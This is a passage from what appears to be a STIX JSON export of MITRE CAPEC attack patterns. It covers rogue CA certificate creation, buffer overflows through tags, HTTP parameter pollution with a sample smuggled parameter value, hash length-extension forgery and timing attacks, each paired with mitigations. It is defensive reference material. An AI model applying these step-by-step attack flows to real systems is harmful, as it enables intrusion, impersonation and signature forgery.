Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for \"flash\" based malware or malicious logic.\n One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their \"to be signed\" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. 
The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.", + "external_references": [ + { + "external_id": "CAPEC-459", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/459.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org", + "external_id": "REF-395", + "source_name": "reference_from_CAPEC", + "url": "http://www.phreedom.org/research/rogue-ca/" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 considered harmful today, 2009--12", + "external_id": "REF-587", + "source_name": "reference_from_CAPEC", + "url": "https://www.win.tue.nl/hashclash/rogue-ca/#Ref" + } + ], + "id": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Creating a Rogue Certification Authority Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + 
"\n MD5 Collisions\n The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2004-2761", + "\n SHA1 Collisions\n The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2005-4900", + "\n PKI Infrastructure vulnerabilities\n Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft Certificates: The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value.

  2. Send CSR to Certificate Authority: The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key.

Exploit

  1. Insert Signed Blob into Unsigned Certificate: The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed.

", + "x_capec_extended_description": "\n Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed" + ], + "x_capec_resources_required": [ + "Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance", + "A valid certificate request and a malicious certificate request with identical hash values" + ], + "x_capec_skills_required": { + "High": "An attacker must be able to craft two X.509 certificates that produce the same hash value", + "Medium": "Knowledge needed to set up a certification authority" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Certification Authorities need to stop using deprecated or cryptographically insecure hashing algorithms to hash the certificates that they are about to sign. 
Instead they should be using stronger hashing functions such as SHA-256 or SHA-512.", + "id": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-459-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--323c57c1-b086-4b0d-81cb-1cf8a0bb21d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "spec_version": "2.1", + "target_ref": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. 
The adversary crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.", + "external_references": [ + { + "external_id": "CAPEC-46", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/46.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Overflow Variables and Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag.See also: CVE-1999-0946", + "\n A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file.See also: CVE-1999-0971" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries look for applications or programs that accept formatted files, such as configuration files, as input.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Knowing the type of file that an application takes as input, the adversary takes a normal input file and modifies a single variable or tag to contain a large amount of data. If there is a crash, this means that a buffer overflow attack is possible. The adversary will keep changing single variables or tags one by one until they see a change in behavior.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: The adversary will upload the crafted file to the application, causing a buffer overflow.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "The target program consumes user-controllable data in the form of tags or variables.", + "The target program does not perform sufficient boundary checking." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eaa7c808-388e-4b0b-a9c7-56895d4b1188", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45d81297-fcc7-4abb-88f9-43cae938e07e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2abe8d6-7c9a-4465-ad34-052a868dc3b0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not trust input data from user. 
Validate all user input.", + "id": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-46-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--933f0265-0d58-4da3-be7f-f584f3b4b55b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds duplicate HTTP GET/POST parameters by injecting query string delimiters. 
Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.", + "external_references": [ + { + "external_id": "CAPEC-460", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/460.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-147", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-235", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/235.html" + }, + { + "description": "Web Parameter Tampering", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Web_Parameter_Tampering" + }, + { + "description": "Luca Carettoni, Stefano di Paola, HTTP Parameter Pollution (OWASP EU09 Poland), 2008, The Open Web Application Security Project (OWASP)", + "external_id": "REF-397", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-606", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.html" + } + ], + "id": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "HTTP Parameter Pollution (HPP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + 
"attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find User Input: The adversary finds anywhere in the web application that uses user-supplied input in a form or action. This can also be found by looking at parameters in the URL in the navigation bar of the browser

Experiment

  1. Add Duplicate Parameter Values: Once the adversary has identified what user input is used as HTTP parameters, they will add duplicates to each parameter one by one to observe the results. If the response from the HTTP request shows the duplicate parameter value concatenated with the original parameter value in some way, or simply just the duplicate parameter value, then HPP is possible.

  2. Techniques
    In the URL, add a duplicate parameter by using the \"&\" delimiter. For example \"par1=val1\" becomes \"par1=val1&par1=val2\". Depending on the backend API, this could be treated as \"par1=val1, val2\", which could lead to par1 being set to val2, ignoring val1.
    If the request is created based on user input directly on the page, the adversary will test by adding an encoded delimiter to the input. For example, the adverary might supply \"1000%26action=withdraw\" and the backend might interpret a POST request with the paramters \"action=deposit&amount=1000&action=withdraw\"

Exploit

  1. Leverage HPP: Once the adversary has identified how the backend handles duplicate parameters, they will leverage this by polluting the paramters in a way that benefits them. In some cases, hardcoded parameters will be disregarded by the backend. In others, the adversary can bypass a WAF that might only check a parameter before it has been concatenated by the backend, resulting in malicious queries getting through.

", + "x_capec_prerequisites": [ + "HTTP protocol is used with some GET/POST parameters passed" + ], + "x_capec_resources_required": [ + "Any tool that enables intercepting and tampering with HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests", + "id": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1f5c4e8-5bc1-44be-a928-3f47b794cce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform URL encoding", + "id": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c9d7213f-0542-4267-896f-cde00d9ba131", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strict regular expressions in URL rewriting", + "id": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48510a25-def9-4c25-85ee-67173f7f2246", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Beware of multiple occurrences of a parameter in a Query String", + "id": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-3", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--315c1643-cc8e-472e-8bbc-264b098bf84b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "spec_version": "2.1", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.", + "external_references": [ + { + "external_id": "CAPEC-461", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "external_id": "REF-398", + "source_name": "reference_from_CAPEC", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf" + } + ], + "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Services API Signature Forgery 
Leveraging Hash Function Extension Weakness", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

  2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

  2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

  2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
", + "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of 
the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1", + "id": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-461-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e90459-19d2-486f-ab40-7a72b5bc43fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "spec_version": "2.1", + "target_ref": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. 
Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.", + "external_references": [ + { + "external_id": "CAPEC-462", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/462.html" + }, + { + "external_id": "CWE-385", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Chris Evans, Cross-Domain Search Timing, 2009--12---11", + "external_id": "REF-399", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html" + } + ], + "id": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross-Domain Search Timing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine service to send cross domain requests to: The adversary first determines which service they will be sending the requests to

Experiment

  1. Send and time various cross domain requests: Adversaries will send a variety of cross domain requests to the target, timing the time it takes for the target to respond. Although they won't be able to read the response, the adversary can use the time to infer information about what the service did upon receiving the request.

  2. Techniques
